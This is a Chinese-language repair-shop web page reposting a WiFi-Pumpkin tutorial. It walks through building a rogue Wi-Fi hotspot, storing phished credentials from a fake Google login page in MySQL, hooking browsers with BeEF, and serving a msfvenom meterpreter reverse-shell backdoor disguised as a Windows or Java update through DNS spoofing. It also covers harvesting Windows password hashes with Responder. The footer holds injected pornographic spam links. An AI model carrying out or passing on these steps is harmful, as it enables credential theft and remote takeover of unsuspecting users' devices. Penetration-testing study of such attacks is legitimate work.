錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
WiFi-Pumpkin無線滲透測試框架實戰教程

作者: 佚名  日期:2017-06-28 16:37:40   來源: 本站整理

 描述
WiFi-Pumpkin是一款專用于無線環境滲透測試的完整框架,利用該工具可以偽造接入點完成中間人攻擊,同時也支持一些其他的無線滲透測試功能。旨在提供更安全的無線網絡服務,該工具可以用來監聽目標的流量數據,通過無線釣魚的方式來捕獲不知情的用戶,以此來達到監控目標用戶數據流量的目的。
主要功能
Rouge WiFi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM
Karma Attack (supporthostapd-mana)
LLMNR,NBT-NS and MDNSpoisoner(Responder)
Pumpkin-Proxy(ProxyServer(mitmproxyAPI))
Capture images on the fly
TCP-Proxy(with scapy)
插件
Plugin
Description
Dns2proxy
This tools offer a deffierent features for post-explotation once you change the DNS server to a Victim.
Sslstrip2
Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork
Sergio-proxy
Sergio Proxy(a Super Effective Recorder of Gathered inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng
Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy.
Responder
Responder an LLMNR, NBT-NS and MDNS poisoner.
Transparent Proxy:
TransparentProxy可以允許用戶攔截/修改流量信息,同時可以實現目標頁面的javascripts注入,也可以輕松實現模塊化注入并創建一個Python文件(plugins/extension/目錄下),最后在PumpProxy(標簽)下顯示信息。

TCP-Proxy Server
在TCP stream中你可以設置一個代理。它可以通過scapy模塊過濾請求和響應流并且主動修改TCP protocol的數據包來獲得攔截。這插件使用模塊來view或者modify這攔截數據,僅僅加你的自定義模塊在”plugins/analyzers/”,自動被列舉在TCP-Proxy標簽。
安裝WiFi-Pumpkin
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
pip install –r requirements.txt
./installer.sh –install
運行WiFi-Pumpkin:python wifi-pumpkin.py
創建釣魚頁面
設置MYSQL
/etc/init.d/mysql start
Mysql –u root
Create database xeus;
Use xeus;
Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

下載Fake Page
git clone https://github.com/XeusHack/Fake-Login-Page.git
將Fake-Login-Page文件放到/var/www目錄下。
編輯database.php文件,設置文件內容:
$username = “root”;
$password = “”;
$db_name = “xeus”;
$tbl_name = “logins”;
這里設置的內容根據自己的環境而設定,我這里是我的環境。
重啟mysql:/etc/init.d/mysql restart
設置WiFi-Pumpkin
運行WiFi-Pumpkin,進入此目錄下,python WiFi-Pumpkin.py

 切換到Settings命令,可以設置SSID號,我這里直接選擇默認的PumpAP,信道號為11,這里我選擇了Enable Wireless Security,密碼為1234567890等。注意:這里NetworkAdapter是無線網卡的名稱,需要買一個無線網卡。

   然后往下拉,可以看到默認設置dhcp服務設置的信息,這里保持默認就行。
取消代理,在旁邊Plugins點擊,然后取消proxy server,如圖所示。

點擊Start,然后可以在手機上可以看到SSID為PumpAP的無線熱點。可以看到是加密狀態,輸入設置的密碼;1234567890,就可以連接上。

然后點擊Modules選項下的DNS Spoofer,進入頁面,以DNSSpoof默認域名example.com為例,點擊Start Attack。使DNS SpoofRunning…

選擇PhishingManager模塊,選擇Options里面的index.html,點擊StartServer。然后在手機客戶端連接上PumpAP無線熱點后,輸入example.com域名后,出現了設置的信息。
然后選擇SetDirectory,如圖所示,將上面設置的Fake-Login-Page路徑設置到SetEnv PATH里面,然后點擊StartServer。可以看到在手機客戶端里面出現的相關偽造的頁面。

在上面的偽造google頁面輸入郵箱和密碼之后,然后進入mysql的logins表中,可以看到相關的信息。

Beef配合攻擊
在/usr/share/beef-xss目錄下運行./beef。如圖所示。選擇其中的Hook URL。

然后http://127.0.0.1:3000/ui/authentication登陸beef,默認賬號和密碼都是beef。
按照上面設置PumpAP無線熱點過程,進入到Phishing Manager模塊,選中按照如圖所示進行設置。

然后點擊StartServer運行,然后在手機客戶端連接上PumpAP無線熱點,然后打開example.com域名。在beef頁面會出現受攻擊的機器。然后可以通過beef進入深入攻擊了。

反彈shell
生成一個shellcode后門,利用msfvenom命令:mefvenom –pwindows/meterpreter/reverse_tcp lhost=你的本機IP地址 lport=4444 –f exe –o windowsupdate.exe進入msfconsole界面,等待shell連接。

按照設置WiFi-Pumokin,進入DNS Spoofer界面,然后刪除DNS:spoof;里面的example.com,然后自己填入一個域名(我這里依然選擇example.com),這里注意一定要刪除之前的example.com,要不會占用一個端口,后面操作不會成功的。

在DNS spoofer頁面選擇Fake Update,進入此頁面,然后將自己生產的shellcode后門加入該路徑,這里可以選擇WindowsUpdate或者Java Update更新,Network Adapter要選擇wlan0,自己的無線網卡。

然后在目標機器連接到我的偽造的PumpAP無線熱點,輸入example.com域名。可以進入上面選擇的偽造頁面。

javaUpdate頁面如下圖所示。

如果被攻擊者電腦下載了我們的后門,安裝了后門。那么我們就可以在kali里面獲取它的電腦權限。

Stealing Accouts Password Hashes
運行WiFi-Pumpkin程序,在界面上Advanced Mode:Monitor MITM Attack選擇Responder。如圖所示。

然后在Plugins選擇Responder,并且關閉Enable proxy server.可以在change打開配置頁面。(一般默認就好,也可以根據自己想要抓取的選擇開啟和關閉),如圖所示。


我們主要的目的是抓取windows的賬號和密碼,在目標機器上運行此操作,就會在wifi-pumpkin的responder顯示出目標機的用戶名和hash密碼。

 

總結:

上面的主要是參考部分文章然后自己來驗證的,參考文章如下:



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 国产精品亚洲专区无码牛牛| 中字无码av电影在线观看网站| 色综合久久久无码中文字幕| 波多野结衣AV无码| 国产亚洲精久久久久久无码| 色窝窝无码一区二区三区色欲| 日日摸夜夜添无码AVA片| 超清无码一区二区三区| 日韩美无码五月天| 亚洲AV无码乱码在线观看富二代 | 东京热av人妻无码专区| 人妻精品无码一区二区三区| 69堂人成无码免费视频果冻传媒| 久久久91人妻无码精品蜜桃HD| 少妇人妻偷人精品无码AV | 亚洲综合无码精品一区二区三区| 亚洲av无码专区首页| 亚洲AV无码成人专区| 亚洲天然素人无码专区| 无码A级毛片免费视频内谢| 久久精品无码免费不卡| 国产成人精品一区二区三区无码| 国产精品xxxx国产喷水亚洲国产精品无码久久一区 | 日韩午夜福利无码专区a| 日韩精品无码AV成人观看| 无码中文字幕日韩专区视频| 制服在线无码专区| 日韩精品无码成人专区| 国产精品无码久久久久| 熟妇人妻AV无码一区二区三区| 无码av高潮喷水无码专区线| 国产嫖妓一区二区三区无码| 国产精品无码v在线观看| 毛片免费全部播放无码| 国产精品无码av片在线观看播| 亚洲中文字幕无码爆乳AV| 亚洲国产精品无码第一区二区三区 | 亚洲国产无套无码av电影| 精品亚洲成A人无码成A在线观看| 国产日产欧洲无码视频无遮挡| 亚洲熟妇无码久久精品|